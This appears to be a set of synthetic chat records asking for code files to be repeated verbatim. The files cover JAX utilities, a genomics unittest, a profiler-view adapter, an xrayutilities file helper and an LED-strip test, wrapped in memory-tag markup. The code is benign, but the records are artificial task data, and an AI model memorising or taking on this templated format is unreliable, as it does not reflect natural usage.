return jax.tree_map(lambda x: x.reshape((device_count, -1) + x.shape[1:]), xs)
def to_device(xs):
"""Transfer data to devices (GPU/TPU)."""
return jax.tree_map(jnp.array, xs)
def unshard(x, padding=0):
"""Collect the sharded tensor to the shape before sharding."""
if padding > 0:
return x.reshape([x.shape[0] * x.shape[1]] + list(x.shape[2:]))[:-padding]
else:
return x.reshape([x.shape[0] * x.shape[1]] + list(x.shape[2:]))
def normalize(x):
"""Normalization helper function."""
return x / np.linalg.norm(x)
def parallel_map(f, iterable, max_threads=None, show_pbar=False, **kwargs):
"""Parallel version of map()."""
with futures.ThreadPoolExecutor(max_threads) as executor:
if show_pbar:
results = tqdm.tqdm(
executor.map(f, iterable, **kwargs), total=len(iterable))
else:
results = executor.map(f, iterable, **kwargs)
return list(results)
def strided_subset(sequence, count):
"""Returns a strided subset of a list."""
if count:
stride = max(1, len(sequence) // count)
return sequence[::stride]
return sequence
def tree_collate(list_of_pytrees):
"""Collates a list of pytrees with the same structure."""
return tree_util.tree_multimap(lambda *x: np.asarray(x), *list_of_pytrees)
@contextlib.contextmanager
def print_time(name):
"""Records the time elapsed."""
start = time.time()
yield
elapsed = time.time() - start
print(f'[{name}] time elapsed: {elapsed:.04f}')
class ValueMeter:
"""Tracks the average of a value."""
def __init__(self):
self._values = []
def reset(self):
"""Resets the meter."""
self._values.clear()
def update(self, value):
"""Adds a value to the meter."""
self._values.append(value)
def reduce(self, reduction='mean'):
"""Reduces the tracked values."""
if reduction == 'mean':
return np.mean(self._values)
elif reduction == 'std':
return np.std(self._values)
elif reduction == 'last':
return self._values[-1]
else:
raise ValueError(f'Unknown reduction {reduction}')
class TimeTracker:
"""Tracks the average time elapsed over multiple steps."""
def __init__(self):
self._meters = collections.defaultdict(ValueMeter)
self._marked_time = collections.defaultdict(float)
@contextlib.contextmanager
def record_time(self, key: str):
"""Records the time elapsed."""
start = time.time()
yield
elapsed = time.time() - start
self.update(key, elapsed)
def update(self, key, value):
"""Updates the time value for a given key."""
self._meters[key].update(value)
def tic(self, *args):
"""Marks the starting time of an event."""
for key in args:
self._marked_time[key] = time.time()
def toc(self, *args):
"""Records the time elapsed based on the previous call to `tic`."""
for key in args:
self.update(key, time.time() - self._marked_time[key])
del self._marked_time[key]
def reset(self):
"""Resets all time meters."""
for meter in self._meters.values():
meter.reset()
def summary(self, reduction='mean'):
"""Returns a dictionary of reduced times."""
time_dict = {k: v.reduce(reduction) for k, v in self._meters.items()}
if 'total' not in time_dict:
time_dict['total'] = sum(time_dict.values())
time_dict['steps_per_sec'] = 1.0 / time_dict['total']
return time_dict
def summary_str(self, reduction='mean'):
"""Returns a string of reduced times."""
strings = [f'{k}={v:.04f}' for k, v in self.summary(reduction).items()]
return ', '.join(strings)
```
|
[
{
"content": "```python\n'''\nCopyright (c) 2016 Genome Research Ltd.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\nof the Software, and to permit persons to whom the Software is furnished to do\nso, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n'''\n\nimport unittest\nimport math\n\nfrom pandas import DataFrame, Series\n\nfrom denovoFilter.site_deviations import site_strand_bias, test_sites, test_genes\n\nclass TestSiteDeviations(unittest.TestCase):\n \n def setUp(self):\n \n self.counts = DataFrame({'person_stable_id': ['a', 'b'],\n 'chrom': ['1', '1'],\n 'pos': [1, 2],\n 'ref': ['A', 'G'],\n 'alt': ['C', 'T'],\n 'symbol': ['TEST1', 'TEST2'],\n 'child_ref_F': [40, 15], 'child_ref_R': [15, 15],\n 'child_alt_F': [20, 15], 'child_alt_R': [25, 15],\n 'mother_ref_F': [40, 20], 'mother_ref_R': [15, 20],\n 'mother_alt_F': [0, 0], 'mother_alt_R': [1, 0],\n 'father_ref_F': [60, 30], 'father_ref_R': [30, 30],\n 'father_alt_F': [0, 0], 'father_alt_R': [1, 1],\n 'min_parent_alt': [1, 0]\n })\n \n def check_series(self, a, b):\n '''\n '''\n \n for x, y in zip(a, b):\n if math.isnan(x):\n self.assertTrue(math.isnan(x))\n self.assertTrue(math.isnan(y))\n else:\n self.assertAlmostEqual(x, y, 14)\n \n def test_site_strand_bias(self):\n ''' check that site_strand_bias works correctly\n '''\n \n site = {'ref_F': 5, 'ref_R': 30, 'alt_F': 10, 'alt_R': 10}\n self.assertAlmostEqual(site_strand_bias(site), 0.010024722592, places=11)\n \n site = {'ref_F': 30, 'ref_R': 30, 'alt_F': 10, 'alt_R': 10}\n self.assertEqual(site_strand_bias(site), 1.0)\n \n # zero counts give a p-value of 1.0\n site = {'ref_F': 0, 'ref_R': 0, 'alt_F': 0, 'alt_R': 0}\n self.assertEqual(site_strand_bias(site), 1.0)\n \n # check that values which would ordinarily give out of bounds errors\n # instead are converted to a p-value of 1.0. Some versions of scipy have\n # fixed this bug, and give a correct value, which we need to check too.\n # A later scipy version (0.19.0) changed how the hypergeometric\n # distribution is estimated, which shifts the Fisher exact p-value from\n # the 7th significant figure onwards.\n site = {'ref_F': 1, 'ref_R': 2, 'alt_F': 9, 'alt_R': 84419233}\n self.assertIn(site_strand_bias(site), (1.0, 3.5536923140874242e-07,\n 3.5536916732288063e-07))\n \n def test_test_sites(self):\n ''' check p-values from tests of strand and parental alt bias.\n '''\n \n expected = [[0.00061560815415820467, 1.0], [0.035457115371929658, 0.18307032892094907]]\n \n for x, y in zip(test_sites(self.counts), expected):\n self.check_series(x, y)\n \n # check when we mask some variants due to failing earlier variants\n expected = [[float('nan'), 1.0], [float('nan'), 0.18307032892094907]]\n for x, y in zip(test_sites(self.counts, pass_status=[False, True]), expected):\n self.check_series(x, y)\n \n def test_test_genes(self):\n ''' check p-values from test of parental alt bias within genes.\n '''\n \n # one of the sites fails the strand bias filter, so this gets dropped\n # for checking gene-based paternal alt biases\n sb, pa = test_sites(self.counts)\n expected = [float('nan'), 0.18307032892094907]\n \n self.check_series(test_genes(self.counts, sb), expected)\n \n # check when we mask some variants due to failing earlier variants\n expected = [float('nan'), float('nan')]\n self.check_series(test_genes(self.counts, sb, pass_status=[True, False]), expected)\n```\nRepeat the code exactly as written.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n'''\nCopyright (c) 2016 Genome Research Ltd.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\nof the Software, and to permit persons to whom the Software is furnished to do\nso, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n'''\n\nimport unittest\nimport math\n\nfrom pandas import DataFrame, Series\n\nfrom denovoFilter.site_deviations import site_strand_bias, test_sites, test_genes\n\nclass TestSiteDeviations(unittest.TestCase):\n \n def setUp(self):\n \n self.counts = DataFrame({'person_stable_id': ['a', 'b'],\n 'chrom': ['1', '1'],\n 'pos': [1, 2],\n 'ref': ['A', 'G'],\n 'alt': ['C', 'T'],\n 'symbol': ['TEST1', 'TEST2'],\n 'child_ref_F': [40, 15], 'child_ref_R': [15, 15],\n 'child_alt_F': [20, 15], 'child_alt_R': [25, 15],\n 'mother_ref_F': [40, 20], 'mother_ref_R': [15, 20],\n 'mother_alt_F': [0, 0], 'mother_alt_R': [1, 0],\n 'father_ref_F': [60, 30], 'father_ref_R': [30, 30],\n 'father_alt_F': [0, 0], 'father_alt_R': [1, 1],\n 'min_parent_alt': [1, 0]\n })\n \n def check_series(self, a, b):\n '''\n '''\n \n for x, y in zip(a, b):\n if math.isnan(x):\n self.assertTrue(math.isnan(x))\n self.assertTrue(math.isnan(y))\n else:\n self.assertAlmostEqual(x, y, 14)\n \n def test_site_strand_bias(self):\n ''' check that site_strand_bias works correctly\n '''\n \n site = {'ref_F': 5, 'ref_R': 30, 'alt_F': 10, 'alt_R': 10}\n self.assertAlmostEqual(site_strand_bias(site), 0.010024722592, places=11)\n \n site = {'ref_F': 30, 'ref_R': 30, 'alt_F': 10, 'alt_R': 10}\n self.assertEqual(site_strand_bias(site), 1.0)\n \n # zero counts give a p-value of 1.0\n site = {'ref_F': 0, 'ref_R': 0, 'alt_F': 0, 'alt_R': 0}\n self.assertEqual(site_strand_bias(site), 1.0)\n \n # check that values which would ordinarily give out of bounds errors\n # instead are converted to a p-value of 1.0. Some versions of scipy have\n # fixed this bug, and give a correct value, which we need to check too.\n # A later scipy version (0.19.0) changed how the hypergeometric\n # distribution is estimated, which shifts the Fisher exact p-value from\n # the 7th significant figure onwards.\n site = {'ref_F': 1, 'ref_R': 2, 'alt_F': 9, 'alt_R': 84419233}\n self.assertIn(site_strand_bias(site), (1.0, 3.5536923140874242e-07,\n 3.5536916732288063e-07))\n \n def test_test_sites(self):\n ''' check p-values from tests of strand and parental alt bias.\n '''\n \n expected = [[0.00061560815415820467, 1.0], [0.035457115371929658, 0.18307032892094907]]\n \n for x, y in zip(test_sites(self.counts), expected):\n self.check_series(x, y)\n \n # check when we mask some variants due to failing earlier variants\n expected = [[float('nan'), 1.0], [float('nan'), 0.18307032892094907]]\n for x, y in zip(test_sites(self.counts, pass_status=[False, True]), expected):\n self.check_series(x, y)\n \n def test_test_genes(self):\n ''' check p-values from test of parental alt bias within genes.\n '''\n \n # one of the sites fails the strand bias filter, so this gets dropped\n # for checking gene-based paternal alt biases\n sb, pa = test_sites(self.counts)\n expected = [float('nan'), 0.18307032892094907]\n \n self.check_series(test_genes(self.counts, sb), expected)\n \n # check when we mask some variants due to failing earlier variants\n expected = [float('nan'), float('nan')]\n self.check_series(test_genes(self.counts, sb, pass_status=[True, False]), expected)\n```<|memory_end|>\nRepeat the code exactly as written.",
"role": "user"
}
] |
```python
'''
Copyright (c) 2016 Genome Research Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
import unittest
import math
from pandas import DataFrame, Series
from denovoFilter.site_deviations import site_strand_bias, test_sites, test_genes
class TestSiteDeviations(unittest.TestCase):
def setUp(self):
self.counts = DataFrame({'person_stable_id': ['a', 'b'],
'chrom': ['1', '1'],
'pos': [1, 2],
'ref': ['A', 'G'],
'alt': ['C', 'T'],
'symbol': ['TEST1', 'TEST2'],
'child_ref_F': [40, 15], 'child_ref_R': [15, 15],
'child_alt_F': [20, 15], 'child_alt_R': [25, 15],
'mother_ref_F': [40, 20], 'mother_ref_R': [15, 20],
'mother_alt_F': [0, 0], 'mother_alt_R': [1, 0],
'father_ref_F': [60, 30], 'father_ref_R': [30, 30],
'father_alt_F': [0, 0], 'father_alt_R': [1, 1],
'min_parent_alt': [1, 0]
})
def check_series(self, a, b):
'''
'''
for x, y in zip(a, b):
if math.isnan(x):
self.assertTrue(math.isnan(x))
self.assertTrue(math.isnan(y))
else:
self.assertAlmostEqual(x, y, 14)
def test_site_strand_bias(self):
''' check that site_strand_bias works correctly
'''
site = {'ref_F': 5, 'ref_R': 30, 'alt_F': 10, 'alt_R': 10}
self.assertAlmostEqual(site_strand_bias(site), 0.010024722592, places=11)
site = {'ref_F': 30, 'ref_R': 30, 'alt_F': 10, 'alt_R': 10}
self.assertEqual(site_strand_bias(site), 1.0)
# zero counts give a p-value of 1.0
site = {'ref_F': 0, 'ref_R': 0, 'alt_F': 0, 'alt_R': 0}
self.assertEqual(site_strand_bias(site), 1.0)
# check that values which would ordinarily give out of bounds errors
# instead are converted to a p-value of 1.0. Some versions of scipy have
# fixed this bug, and give a correct value, which we need to check too.
# A later scipy version (0.19.0) changed how the hypergeometric
# distribution is estimated, which shifts the Fisher exact p-value from
# the 7th significant figure onwards.
site = {'ref_F': 1, 'ref_R': 2, 'alt_F': 9, 'alt_R': 84419233}
self.assertIn(site_strand_bias(site), (1.0, 3.5536923140874242e-07,
3.5536916732288063e-07))
def test_test_sites(self):
''' check p-values from tests of strand and parental alt bias.
'''
expected = [[0.00061560815415820467, 1.0], [0.035457115371929658, 0.18307032892094907]]
for x, y in zip(test_sites(self.counts), expected):
self.check_series(x, y)
# check when we mask some variants due to failing earlier variants
expected = [[float('nan'), 1.0], [float('nan'), 0.18307032892094907]]
for x, y in zip(test_sites(self.counts, pass_status=[False, True]), expected):
self.check_series(x, y)
def test_test_genes(self):
''' check p-values from test of parental alt bias within genes.
'''
# one of the sites fails the strand bias filter, so this gets dropped
# for checking gene-based paternal alt biases
sb, pa = test_sites(self.counts)
expected = [float('nan'), 0.18307032892094907]
self.check_series(test_genes(self.counts, sb), expected)
# check when we mask some variants due to failing earlier variants
expected = [float('nan'), float('nan')]
self.check_series(test_genes(self.counts, sb, pass_status=[True, False]), expected)
```
|
[
{
"content": "Repeat the following code:\n```python\nimport wx, sys, os, logging\nlog = logging.getLogger( __name__ )\nfrom squaremap import squaremap\nfrom runsnakerun import pstatsloader\n\nclass PStatsAdapter(squaremap.DefaultAdapter):\n\n percentageView = False\n total = 0\n \n TREE = pstatsloader.TREE_CALLS\n\n def value(self, node, parent=None):\n if isinstance(parent, pstatsloader.PStatGroup):\n if parent.cumulative:\n return node.cumulative / parent.cumulative\n else:\n return 0\n elif parent is None:\n return node.cumulative\n return parent.child_cumulative_time(node)\n\n def label(self, node):\n if isinstance(node, pstatsloader.PStatGroup):\n return '%s / %s' % (node.filename, node.directory)\n if self.percentageView and self.total:\n time = '%0.2f%%' % round(node.cumulative * 100.0 / self.total, 2)\n else:\n time = '%0.3fs' % round(node.cumulative, 3)\n return '%s@%s:%s [%s]' % (node.name, node.filename, node.lineno, time)\n\n def empty(self, node):\n if node.cumulative:\n return node.local / float(node.cumulative)\n return 0.0\n\n def parents(self, node):\n \"\"\"Determine all parents of node in our tree\"\"\"\n return [\n parent for parent in\n getattr( node, 'parents', [] )\n if getattr(parent, 'tree', self.TREE) == self.TREE\n ]\n\n color_mapping = None\n\n def background_color(self, node, depth):\n \"\"\"Create a (unique-ish) background color for each node\"\"\"\n if self.color_mapping is None:\n self.color_mapping = {}\n color = self.color_mapping.get(node.key)\n if color is None:\n depth = len(self.color_mapping)\n red = (depth * 10) % 255\n green = 200 - ((depth * 5) % 200)\n blue = (depth * 25) % 200\n self.color_mapping[node.key] = color = wx.Colour(red, green, blue)\n return color\n\n def SetPercentage(self, percent, total):\n \"\"\"Set whether to display percentage values (and total for doing so)\"\"\"\n self.percentageView = percent\n self.total = total\n\n def filename( self, node ):\n \"\"\"Extension to squaremap api to provide \"what file is this\" information\"\"\"\n if not node.directory:\n # TODO: any cases other than built-ins?\n return None\n if node.filename == '~':\n # TODO: look up C/Cython/whatever source???\n return None\n return os.path.join(node.directory, node.filename)\n \n\nclass DirectoryViewAdapter(PStatsAdapter):\n \"\"\"Provides a directory-view-only adapter for PStats objects\"\"\"\n TREE = pstatsloader.TREE_FILES\n def children(self, node):\n if isinstance(node, pstatsloader.PStatGroup):\n return node.children\n return []\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the following code:\n<|memory_start|>```python\nimport wx, sys, os, logging\nlog = logging.getLogger( __name__ )\nfrom squaremap import squaremap\nfrom runsnakerun import pstatsloader\n\nclass PStatsAdapter(squaremap.DefaultAdapter):\n\n percentageView = False\n total = 0\n \n TREE = pstatsloader.TREE_CALLS\n\n def value(self, node, parent=None):\n if isinstance(parent, pstatsloader.PStatGroup):\n if parent.cumulative:\n return node.cumulative / parent.cumulative\n else:\n return 0\n elif parent is None:\n return node.cumulative\n return parent.child_cumulative_time(node)\n\n def label(self, node):\n if isinstance(node, pstatsloader.PStatGroup):\n return '%s / %s' % (node.filename, node.directory)\n if self.percentageView and self.total:\n time = '%0.2f%%' % round(node.cumulative * 100.0 / self.total, 2)\n else:\n time = '%0.3fs' % round(node.cumulative, 3)\n return '%s@%s:%s [%s]' % (node.name, node.filename, node.lineno, time)\n\n def empty(self, node):\n if node.cumulative:\n return node.local / float(node.cumulative)\n return 0.0\n\n def parents(self, node):\n \"\"\"Determine all parents of node in our tree\"\"\"\n return [\n parent for parent in\n getattr( node, 'parents', [] )\n if getattr(parent, 'tree', self.TREE) == self.TREE\n ]\n\n color_mapping = None\n\n def background_color(self, node, depth):\n \"\"\"Create a (unique-ish) background color for each node\"\"\"\n if self.color_mapping is None:\n self.color_mapping = {}\n color = self.color_mapping.get(node.key)\n if color is None:\n depth = len(self.color_mapping)\n red = (depth * 10) % 255\n green = 200 - ((depth * 5) % 200)\n blue = (depth * 25) % 200\n self.color_mapping[node.key] = color = wx.Colour(red, green, blue)\n return color\n\n def SetPercentage(self, percent, total):\n \"\"\"Set whether to display percentage values (and total for doing so)\"\"\"\n self.percentageView = percent\n self.total = total\n\n def filename( self, node ):\n \"\"\"Extension to squaremap api to provide \"what file is this\" information\"\"\"\n if not node.directory:\n # TODO: any cases other than built-ins?\n return None\n if node.filename == '~':\n # TODO: look up C/Cython/whatever source???\n return None\n return os.path.join(node.directory, node.filename)\n \n\nclass DirectoryViewAdapter(PStatsAdapter):\n \"\"\"Provides a directory-view-only adapter for PStats objects\"\"\"\n TREE = pstatsloader.TREE_FILES\n def children(self, node):\n if isinstance(node, pstatsloader.PStatGroup):\n return node.children\n return []\n```<|memory_end|>",
"role": "user"
}
] |
```python
import wx, sys, os, logging
log = logging.getLogger( __name__ )
from squaremap import squaremap
from runsnakerun import pstatsloader
class PStatsAdapter(squaremap.DefaultAdapter):
percentageView = False
total = 0
TREE = pstatsloader.TREE_CALLS
def value(self, node, parent=None):
if isinstance(parent, pstatsloader.PStatGroup):
if parent.cumulative:
return node.cumulative / parent.cumulative
else:
return 0
elif parent is None:
return node.cumulative
return parent.child_cumulative_time(node)
def label(self, node):
if isinstance(node, pstatsloader.PStatGroup):
return '%s / %s' % (node.filename, node.directory)
if self.percentageView and self.total:
time = '%0.2f%%' % round(node.cumulative * 100.0 / self.total, 2)
else:
time = '%0.3fs' % round(node.cumulative, 3)
return '%s@%s:%s [%s]' % (node.name, node.filename, node.lineno, time)
def empty(self, node):
if node.cumulative:
return node.local / float(node.cumulative)
return 0.0
def parents(self, node):
"""Determine all parents of node in our tree"""
return [
parent for parent in
getattr( node, 'parents', [] )
if getattr(parent, 'tree', self.TREE) == self.TREE
]
color_mapping = None
def background_color(self, node, depth):
"""Create a (unique-ish) background color for each node"""
if self.color_mapping is None:
self.color_mapping = {}
color = self.color_mapping.get(node.key)
if color is None:
depth = len(self.color_mapping)
red = (depth * 10) % 255
green = 200 - ((depth * 5) % 200)
blue = (depth * 25) % 200
self.color_mapping[node.key] = color = wx.Colour(red, green, blue)
return color
def SetPercentage(self, percent, total):
"""Set whether to display percentage values (and total for doing so)"""
self.percentageView = percent
self.total = total
def filename( self, node ):
"""Extension to squaremap api to provide "what file is this" information"""
if not node.directory:
# TODO: any cases other than built-ins?
return None
if node.filename == '~':
# TODO: look up C/Cython/whatever source???
return None
return os.path.join(node.directory, node.filename)
class DirectoryViewAdapter(PStatsAdapter):
"""Provides a directory-view-only adapter for PStats objects"""
TREE = pstatsloader.TREE_FILES
def children(self, node):
if isinstance(node, pstatsloader.PStatGroup):
return node.children
return []
```
|
[
{
"content": "Here is the code block:\n```python\n# This file is part of xrayutilities.\n#\n# xrayutilities is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, see <http://www.gnu.org/licenses/>.\n#\n# Copyright (C) 2013-2019 Dominik Kriegner <[email protected]>\n\n\n\"\"\"\nconvenience functions to open files for various data file reader\n\nthese functions should be used in new parsers since they transparently allow to\nopen gzipped and bzipped files\n\"\"\"\n\nimport bz2\nimport gzip\nimport lzma\n\nimport h5py\n\nfrom .. import config\nfrom ..exception import InputError\n\n\ndef xu_open(filename, mode='rb'):\n \"\"\"\n function to open a file no matter if zipped or not. Files with extension\n '.gz', '.bz2', and '.xz' are assumed to be compressed and transparently\n opened to read like usual files.\n\n Parameters\n ----------\n filename : str\n filename of the file to open (full including path)\n mode : str, optional\n mode in which the file should be opened\n\n Returns\n -------\n file-handle\n handle of the opened file\n\n Raises\n ------\n IOError\n If the file does not exist an IOError is raised by the open routine,\n which is not caught within the function\n \"\"\"\n if config.VERBOSITY >= config.INFO_ALL:\n print(\"XU:io: opening file %s\" % filename)\n if filename.endswith('.gz'):\n fid = gzip.open(filename, mode)\n elif filename.endswith('.bz2'):\n fid = bz2.BZ2File(filename, mode)\n elif filename.endswith('.xz'):\n fid = lzma.open(filename, mode)\n else:\n fid = open(filename, mode)\n\n return fid\n\n\nclass xu_h5open(object):\n \"\"\"\n helper object to decide if a HDF5 file has to be opened/closed when\n using with a 'with' statement.\n \"\"\"\n\n def __init__(self, f, mode='r'):\n \"\"\"\n Parameters\n ----------\n f : str\n filename or h5py.File instance\n mode : str, optional\n mode in which the file should be opened. ignored in case a file\n handle is passed as f\n \"\"\"\n self.closeFile = True\n self.fid = None\n self.mode = mode\n if isinstance(f, h5py.File):\n self.fid = f\n self.closeFile = False\n self.filename = f.filename\n elif isinstance(f, str):\n self.filename = f\n else:\n raise InputError(\"f argument of wrong type was passed, \"\n \"should be string or filename\")\n\n def __enter__(self):\n if self.fid:\n if not self.fid.id.valid:\n self.fid = h5py.File(self.filename, self.mode)\n else:\n self.fid = h5py.File(self.filename, self.mode)\n return self.fid\n\n def __exit__(self, type, value, traceback):\n if self.closeFile:\n self.fid.close()\n```\nOutput it precisely.",
"role": "user"
}
] |
[
{
"content": "Here is the code block:\n<|memory_start|>```python\n# This file is part of xrayutilities.\n#\n# xrayutilities is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, see <http://www.gnu.org/licenses/>.\n#\n# Copyright (C) 2013-2019 Dominik Kriegner <[email protected]>\n\n\n\"\"\"\nconvenience functions to open files for various data file reader\n\nthese functions should be used in new parsers since they transparently allow to\nopen gzipped and bzipped files\n\"\"\"\n\nimport bz2\nimport gzip\nimport lzma\n\nimport h5py\n\nfrom .. import config\nfrom ..exception import InputError\n\n\ndef xu_open(filename, mode='rb'):\n \"\"\"\n function to open a file no matter if zipped or not. Files with extension\n '.gz', '.bz2', and '.xz' are assumed to be compressed and transparently\n opened to read like usual files.\n\n Parameters\n ----------\n filename : str\n filename of the file to open (full including path)\n mode : str, optional\n mode in which the file should be opened\n\n Returns\n -------\n file-handle\n handle of the opened file\n\n Raises\n ------\n IOError\n If the file does not exist an IOError is raised by the open routine,\n which is not caught within the function\n \"\"\"\n if config.VERBOSITY >= config.INFO_ALL:\n print(\"XU:io: opening file %s\" % filename)\n if filename.endswith('.gz'):\n fid = gzip.open(filename, mode)\n elif filename.endswith('.bz2'):\n fid = bz2.BZ2File(filename, mode)\n elif filename.endswith('.xz'):\n fid = lzma.open(filename, mode)\n else:\n fid = open(filename, mode)\n\n return fid\n\n\nclass xu_h5open(object):\n \"\"\"\n helper object to decide if a HDF5 file has to be opened/closed when\n using with a 'with' statement.\n \"\"\"\n\n def __init__(self, f, mode='r'):\n \"\"\"\n Parameters\n ----------\n f : str\n filename or h5py.File instance\n mode : str, optional\n mode in which the file should be opened. ignored in case a file\n handle is passed as f\n \"\"\"\n self.closeFile = True\n self.fid = None\n self.mode = mode\n if isinstance(f, h5py.File):\n self.fid = f\n self.closeFile = False\n self.filename = f.filename\n elif isinstance(f, str):\n self.filename = f\n else:\n raise InputError(\"f argument of wrong type was passed, \"\n \"should be string or filename\")\n\n def __enter__(self):\n if self.fid:\n if not self.fid.id.valid:\n self.fid = h5py.File(self.filename, self.mode)\n else:\n self.fid = h5py.File(self.filename, self.mode)\n return self.fid\n\n def __exit__(self, type, value, traceback):\n if self.closeFile:\n self.fid.close()\n```<|memory_end|>\nOutput it precisely.",
"role": "user"
}
] |
```python
# This file is part of xrayutilities.
#
# xrayutilities is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
# Copyright (C) 2013-2019 Dominik Kriegner <[email protected]>
"""
convenience functions to open files for various data file reader
these functions should be used in new parsers since they transparently allow to
open gzipped and bzipped files
"""
import bz2
import gzip
import lzma
import h5py
from .. import config
from ..exception import InputError
def xu_open(filename, mode='rb'):
"""
function to open a file no matter if zipped or not. Files with extension
'.gz', '.bz2', and '.xz' are assumed to be compressed and transparently
opened to read like usual files.
Parameters
----------
filename : str
filename of the file to open (full including path)
mode : str, optional
mode in which the file should be opened
Returns
-------
file-handle
handle of the opened file
Raises
------
IOError
If the file does not exist an IOError is raised by the open routine,
which is not caught within the function
"""
if config.VERBOSITY >= config.INFO_ALL:
print("XU:io: opening file %s" % filename)
if filename.endswith('.gz'):
fid = gzip.open(filename, mode)
elif filename.endswith('.bz2'):
fid = bz2.BZ2File(filename, mode)
elif filename.endswith('.xz'):
fid = lzma.open(filename, mode)
else:
fid = open(filename, mode)
return fid
class xu_h5open(object):
"""
helper object to decide if a HDF5 file has to be opened/closed when
using with a 'with' statement.
"""
def __init__(self, f, mode='r'):
"""
Parameters
----------
f : str
filename or h5py.File instance
mode : str, optional
mode in which the file should be opened. ignored in case a file
handle is passed as f
"""
self.closeFile = True
self.fid = None
self.mode = mode
if isinstance(f, h5py.File):
self.fid = f
self.closeFile = False
self.filename = f.filename
elif isinstance(f, str):
self.filename = f
else:
raise InputError("f argument of wrong type was passed, "
"should be string or filename")
def __enter__(self):
if self.fid:
if not self.fid.id.valid:
self.fid = h5py.File(self.filename, self.mode)
else:
self.fid = h5py.File(self.filename, self.mode)
return self.fid
def __exit__(self, type, value, traceback):
if self.closeFile:
self.fid.close()
```
|
[
{
"content": "Reconstruct the code exactly:\n```python\nimport pytest\nimport time\n\n\n# Not entirely happy with this check\n# TODO Change when I understand pytest better\ndef skip_if_unplugged():\n import usb.core\n dev = usb.core.find(idVendor=0x0403, idProduct=0x6014)\n if dev is None:\n pytest.skip(\"FT232H not plugged in\")\n\n\ndef test_lights(num_lights, light_type, brightness, backend):\n # Skip if unplugged\n if backend == \"pyftdi\":\n skip_if_unplugged()\n\n # Create string of lights\n light_string = light_type(num_lights, backend=backend,\n brightness=brightness)\n\n # Set light colours\n colours = [(255, 0, 0),\n (0, 255, 0),\n (0, 0, 255),\n (255, 255, 0),\n (255, 0, 255),\n (0, 255, 255)]\n\n for i in range(num_lights):\n light_string[i] = colours[i % len(colours)]\n\n # Update light\n light_string.show()\n\n # Show lights for a few seconds\n time.sleep(3)\n\n\ndef test_lights_2(num_lights, light_type, brightness, backend):\n # Skip if unplugged\n if backend == \"pyftdi\":\n skip_if_unplugged()\n\n # Create string of lights\n light_string = light_type(num_lights, brightness=brightness)\n light_string.backend = backend\n\n 